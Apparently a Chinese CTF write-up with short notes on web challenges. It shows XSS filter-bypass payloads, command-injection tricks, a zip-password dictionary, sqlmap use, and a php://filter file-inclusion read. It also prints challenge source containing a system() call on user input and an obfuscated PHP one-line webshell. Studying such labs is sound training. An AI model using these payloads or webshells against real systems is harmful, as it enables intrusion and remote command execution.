来个弹窗
先用最基础的xss弹窗试一下
<script>alert("xss")</script>
没有内容,猜测过滤了script,双写绕过一下
<scrscriptipt>alert("xss")</scscriptript>
background
查看网页源代码
查看一下js文件
类似于一个命令执行,d为输出,p为动作
0e事件
考察MD5碰撞
复读机RCE
提示不能说,尝试echo一下
可以命令执行
xCsMsD
随便注册一个账号登陆进去
在cmd框下可以执行命令,但是存在过滤
查看下cookies,解个码
这里有一个替换,空格替换成-,\替换成/
所以这里就使用命令
cat-文件来读取文件内容
这里可以使用tac绕过
coke的登陆
查看提示
猜测可能为密码
成功登录,flag在源代码
bllbl_rce
扫描一下目录,发现/admin/admin.php
下载源码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Command Query Tool</title>
</head>
<body>
<h1>Command Query Tool</h1>
<form action="index.php" method="post">
<label for="command">输入你的命令</label>
<input type="text" id="command" name="command" required>
<button type="submit">执行</button>
</form>
<?php
if (isset($_POST['command'])) {
$command = $_POST['command'];
if (strpos($command, 'bllbl') === false) {
die("no");
}
echo "<pre>";
system ($command);
echo "</pre>";
}
?>
</body>
</html>
我们执行命令需要出现bllbl字符,这里可以用&&拼接
椰子树晕淡水鱼
猜测存在文件包含漏洞,扫描一下目录:/password /admin.php
下载一个zip文件
爆破一下压缩包密码
密码字典:
zhsh
2004
yzhsh
y2004
y183
zhshy
zhshzhsh
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
yzhsh
y2004
y183
zhshy
zhsh920
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
zhsh/zhsh920
一个文件上传
再给我30元
查看网页源代码
提示参数为id
这里使用sqlmap
狗黑子CTF变强之路
扫描一下目录:/admin.php
这里可能存在文件包含漏洞
使用为协议读取一下admin.php
?page=php://filter/convert.base64-encode/resource=admin.php
解码
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// 硬编码的用户名和密码
$correctUsername = "ggouheizi";
$correctPassword = "zigouhei";
$username = $_POST['username'];
$password = $_POST['password'];
if ($username == $correctUsername && $password == $correctPassword) {
// 登录成功,直接跳转到 gougougou.php
header("Location: gougougou.php");
exit;
} else {
$errorMessage = "用户名或密码错误,请重新输入。";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>秘境遗迹</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
}
form {
background-color: white;
padding: 20px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
width: 300px;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
}
label {
display: block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="text"],
input[type="password"] {
width: 100%;
padding: 10px;
margin-bottom: 15px;
border: 1px solid #ccc;
border-radius: 5px;
box-sizing: border-box;
transition: border-color 0.3s ease;
}
input[type="text"]:focus,
input[type="password"]:focus {
border-color: #4CAF50;
}
input[type="submit"] {
padding: 10px 20px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
transition: background-color 0.3s ease;
}
input[type="submit"]:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<form method="post">
<label for="username">用户名:</label><br>
<input type="text" name="username"><br>
<label for="password">密码:</label><br>
<input type="password" name="password"><br><br>
<input type="submit" value="登录">
<?php if(isset($errorMessage)) { echo $errorMessage; }?>
</form>
</body>
</html>
再读取gougougou.php文件
<?php
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
?>
混淆解码后为一句话木马,密码为cmd
小白说收集很重要
看题目意思就知道要目录扫描
admin/admin123456
根据题目要求,生成密码
sysadmin/xiaobai
